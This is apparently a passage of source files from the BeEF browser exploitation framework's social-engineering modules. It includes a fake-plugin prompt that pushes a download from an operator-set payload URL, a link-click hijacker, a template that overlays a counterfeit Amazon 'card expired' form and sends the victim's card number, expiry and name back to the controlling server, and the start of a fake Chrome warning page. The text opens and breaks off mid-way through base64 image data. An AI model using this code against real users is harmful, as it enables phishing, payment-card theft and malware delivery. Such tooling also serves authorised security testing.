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" onclick="window.location=\'<%== @url %>\';" />'); }); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace video successful"); });
YAML
beef/modules/social_engineering/replace_video_fake_plugin/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: replace_video_fake_plugin: enable: true category: "Social Engineering" name: "Replace Videos (Fake Plugin)" description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a file from the specified URL." authors: ["Yori Kvitchko", "antisnatchor", "bcoles"] target: user_notify: ['ALL']
Ruby
beef/modules/social_engineering/replace_video_fake_plugin/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Replace_video_fake_plugin < BeEF::Core::Command def self.options [ { 'name' => 'url', 'ui_label' => 'Payload URL', 'value' => '', 'width' => '150px' }, { 'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width' => '150px' } ] end def post_execute content = {} content['Result'] = @datastore['result'] save content end end
JavaScript
beef/modules/social_engineering/simple_hijacker/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // hijack = function(){ function send(answer){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); } <% target = @targets.split(',') %> $j('a').click(function(e) { e.preventDefault(); if ($j(this).attr('href') != '') { if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{ <% tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js" file = File.open(tplpath, "r") @template = file.read %> <%= @template %> beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href')); } } }); } beef.execute(function() { hijack(); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action'); });
YAML
beef/modules/social_engineering/simple_hijacker/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: simple_hijacker: enable: true category: "Social Engineering" name: "Simple Hijacker" description: "Hijack clicks on links to display what you want." templates: ["credential", "confirmbox", "amazon", "chromecertbeggar", "chromecertbeggar2"] authors: ["gallypette"] target: user_notify: ['ALL']
Ruby
beef/modules/social_engineering/simple_hijacker/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Simple_hijacker < BeEF::Core::Command def self.options config = BeEF::Core::Configuration.instance @templates = config.get('beef.module.simple_hijacker.templates') # Defines which domains to target data = [] data.push({ 'name' => 'targets', 'description' => 'list domains you want to hijack - separed by ,', 'ui_label' => 'Targetted domains', 'value' => 'beef' }) # We'll then list all templates available tmptpl = [] @templates.each do |template| tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js" raise "Invalid template path for command template #{template}" unless File.exist?(tplpath) tmptpl << [template] end data.push({ 'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl', 'mode' => 'local', 'emptyText' => 'Choose a template' }) data end # # This method is being called when a zombie sends some # data back to the framework. # def post_execute save({ 'answer' => @datastore['answer'] }) end end
JavaScript
beef/modules/social_engineering/simple_hijacker/templates/amazon.js
/* * Copyright (c) 2006-2023Wade Alcorn - [email protected] * Browser Exploitation Framework (BeEF) - http://beefproject.com * See the file 'doc/COPYING' for copying permission */ beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null); $j(document).attr('title', $j(this).html()); document.body.scroll = 'no'; document.documentElement.style.overflow = 'hidden'; collect = function(){ answer = ""; $j(":input").each(function() { answer += " "+$j(this).attr("name")+":"+$j(this).val(); }); send(answer); } // floating div function writediv() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'hax'); sneakydiv.setAttribute('display', 'block'); sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;'); document.body.appendChild(sneakydiv); sneakydiv.innerHTML= '<div style="margin:5px;">Your credit card details expired, please enter your new credit card credential to continue shopping- <br> <b>Changes made to your payment methods will not affect orders you have already placed. </b></div><table cellspacing=0 cellpadding=0 border=0 width="100%"><tbody><tr><td valign=bottom><b class=h1><nobr><a href="#" style="font-size: medium;font-family: verdana,arial,helvetica;color: #004B91;text-decoration: underline;cursor: auto">Your Account</a></nobr>&gt;</b><h1 class=h1 style="display: inline; color: #E47911; font-size: medium;font-family: verdana,arial;font-weight: bold"><b class=h1><nobr>Add a Credit or Debit Card</nobr></b></h1></td></table><div width="99%" style="border: 2px solid #DDDDCC; -webkit-border-radius: 10px;border-radius: 10px"><table width="100%" border=0 cellspacing=0 cellpadding=0 align=center><tbody><tr><td valign=middle width="20%" nowrap=nowrap height=28><font color="#660000"><b class=sans>&nbsp; Edit your payment method:</b></font></td><tr><td valign=middle width="100%" nowrap=nowrap><table><tbody><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Cardholder Name:</font></b></td><td><input name=name onchange="collect();" size=25 maxlength=60><br></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Exp. Date:</font></b></td><td><select onchange="collect();" name=newCreditCardMonth title=Month id=newCreditCardMonth><option value=01>01<option value=02>02<option value=03>03<option value=04>04<option value=05>05<option value=06>06<option value=07>07<option value=08>08<option value=09>09<option value=10>10<option value=11 selected>11<option value=12>12</select>&nbsp;<select onchange="collect();" name=newCreditCardYear title=Year id=newCreditCardYear><option value=2011 selected>2011<option value=2012>2012<option value=2013>2013<option value=2014>2014<option value=2015>2015<option value=2016>2016<option value=2017>2017<option value=2018>2018<option value=2019>2019<option value=2020>2020<option value=2021>2021<option value=2022>2022<option value=2023>2023<option value=2024>2024<option value=2025>2025<option value=2026>2026<option value=2027>2027<option value=2028>2028<option value=2029>2029<option value=2030>2030<option value=2031>2031<option value=2032>2032<option value=2033>2033<option value=2034>2034<option value=2035>2035<option value=2036>2036<option value=2037>2037</select></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Number:</font></b></td><td><input name=creditcard onchange="collect();" size=16 maxlength=16><br></td><tr><td colspan=2><hr width="100%" noshade=noshade size=1></td><tr><td align=right></td><td><div id="confirm" style="cursor: hand; border: 2px solid #ffcc55; -webkit-border-radius: 10px;border-radius: 10px;font-family: verdana,arial;font-weight: bold" align=center width="20%"><font face="verdana,arial,helvetica" size=-1>Confirm</font></div></td></table></td></table></div>'; } writediv(); $j("#confirm").click(function () { $j('#hax').remove(); });
JavaScript
beef/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
/* * Copyright (c) 2006-2023Wade Alcorn - [email protected] * Browser Exploitation Framework (BeEF) - http://beefproject.com * See the file 'doc/COPYING' for copying permission */ // floating div function writediv() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'background'); sneakydiv.setAttribute('oncontextmenu','return false;'); sneakydiv.setAttribute('style', 'overflow:hidden;position:absolute;width:100%;height:100%;top:0px;left:0px;z-index:51;opacity:1;background-color:#500; font-family:Helvetica,Arial,sans-serif; margin:0px;'); document.body.appendChild(sneakydiv); sneakydiv.innerHTML= '<div style="position:absolute;width:100%;height:100%;"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAJFCAIAAACTIQqNAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAQRJREFUSMe9lVtyxTAIQyUW0C10v9306Qd+NNNeYyfT+8EkEwRIBpz4+vgMSYU5nyYsB+R3u4orzArRnr0OComwHRKBFO7132IOmwCFpUDJY3AdGLVzoL1nnHDIBHLGN8w8L4f4kc8ORBgPHJdab7TRi86fa39IrnrKD1I3tNniZq7kOThylgcpfNGX83aaQ2p9X+mg9VV9hza50mps6KP3cKNHF+yOzlbbQ/OKb+5vpRHyTnnF84TjqLXQjVjPbZuFCjf1b/BaYKbv9eywUYeHPDK/F5i1H1HORaVjz/8bk/+HeV9xqH3GV7z+7lGVu9qZ+szOff8Vy8b+39H5JPZuzELHNyoGruezaO1kAAAAAElFTkSuQmCC" width="100%" height="100%" alt="background" onmousedown="return false;"></div><table width="100%" cellspacing=0 cellpadding=0><td style=padding:40px valign=middle align=center><div style="width:60%; background-color:white; color:black; font-size:10pt; line-height:16pt; text-align:left; padding:20px; position:relative; -webkit-box-shadow:3px 3px 8px #200; border-radius:5px"><div style=position:absolute><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAAA1CAYAAADxhu2sAAAK7UlEQVR4Xs1azY8cR/l+3qrqzxlHE7GR1yaRNieuDodIHCBjCXE2N47OHcgmB05IuxHiEoWMgfAhPjTmAOT28x8A/JxbFJKQQIS4AD4QCCSIKLEzO91d7wvVVUqp1dvb45XjcUm9VV1d3drnfZ/3q2pIRHCa9uaPdjr3x35FADl+wT6AJyDYax8JbgB4EsC1wW9IuA39I195F3eiGZyujYIXGVywIMi+1hbaCJQmEKk9Zv1/dUVP20YORaQHHNIT8tYFsLnWY5sTeD/LLMozjKJkmES1C+uGsLppDm7dpGvVil/niLgnTNmyAMa1LkMvyTJJLab3NThzv0WWCkgBgAYLkGUKZJLF+1YuVmvpgRW5txgwrvXu3KFWzV45tTgzs8gzC8ACDIAYigRprjBlNW8qs9809RXLcrzW5R4SgMgIcN/tKbEHWc6YTBmOBRAbwYHbe6IKWapQTOhgvdJXV9a+x1Z637yTAlCnR74heAEIsjSpRTll5KWFVvzRQ4EALIAwhC1I1SgLOyunaqkN9YDfOz5gDHgcX1Zk53nBcPRPEgY4ABdEQQgDcAJoYFKNcqovHa30nBu5bhvpfhdbZ8C41sN4psCLJHXUt8gKBoF7cT3cBxY0IKmRZTXKM1gmqZoRKCj/nnWCg6xYaO3obFFOGIocwMjjriDCQBiiGmilURZ6r5qa/bqSQ67l3nSCEUA/5is0l7PCto7PpAwSbhGLDPsRAQNsATRIWlNQB9VKXbtl5XWxEhm2fRMIAAbiM0EWzt6LqSDLW+1HwNIHLxJYwICwNwWNGnnukia1SFLVAb9tBoxp4lBRcyGfWEzKBsZYsPUoWQC2ATBHAEThggBtz2A0MLpGUar50UrvNxVfsY1slQHj4AV7EPtEmnFr92nKQaNA0wDrNbA6Am7dAj4Ilxt/uPLPmpAiMHtTIK6Rpo371kGa6RlA22XAuFBkmRqe+ZjPUJrB1oEXVDWwWgFHaw/W2qAFBWQJkGdAlgFpItAKABhCFoqcKahZMU2WdcVfrNdyj6bCgkua7DwrrI/5xjs9ZkFjPfi6fAy7n30G07OPdgDcfPtl/OuVr0FuvggFgJwQKDhE1SAxGpOJvlQd6bmt5fr2nSB6cXxGYJfx+ZifMYg89d3VBO0/OH8hgO+26e6jeOjiC60p1DUgHC7E3CBJa5QTLJNMzbYvgL5HP9DKzsqJL3OV4iAdATNQN2hNICl3MdSSyS7qyvsKDuHFDYQZ4AZGNSgKu1dM9P72nSA64OeKmv2W+hNGkjIIHFLcgMN6Fow1JygrgET5tTcs1gvBNE7AB2/+YPfCNn1AAN6N+eVEvOPz1O+sC8ocbcKAl12UsggBxBA0UEohz12ClCwAXNxyGIwx39G+mLi4HdPdvplgtEWtx7FnUiiYbAOtamcK8z/95Pz+lp2gj/lZ7sDbNuYDtqP1COq2ior+uyFDZLGtQ0wT5w/44I3v7s62xwCRZZJw6/jygqE1B/pKV+syWsRELQfAffYEG2KGWAvyafKsmKjFthhwqa3zc9tqPzEcAMgAlYcEEID7Psyg+y6iECRsnECcuTUoC778h++fm99VJ/jad3ZmJLxMMosyxnyAO0lRHGPABwTgQQiBBTiOPd15MEgakFJIEo2iTJYAHr57DBActHV+6agfY7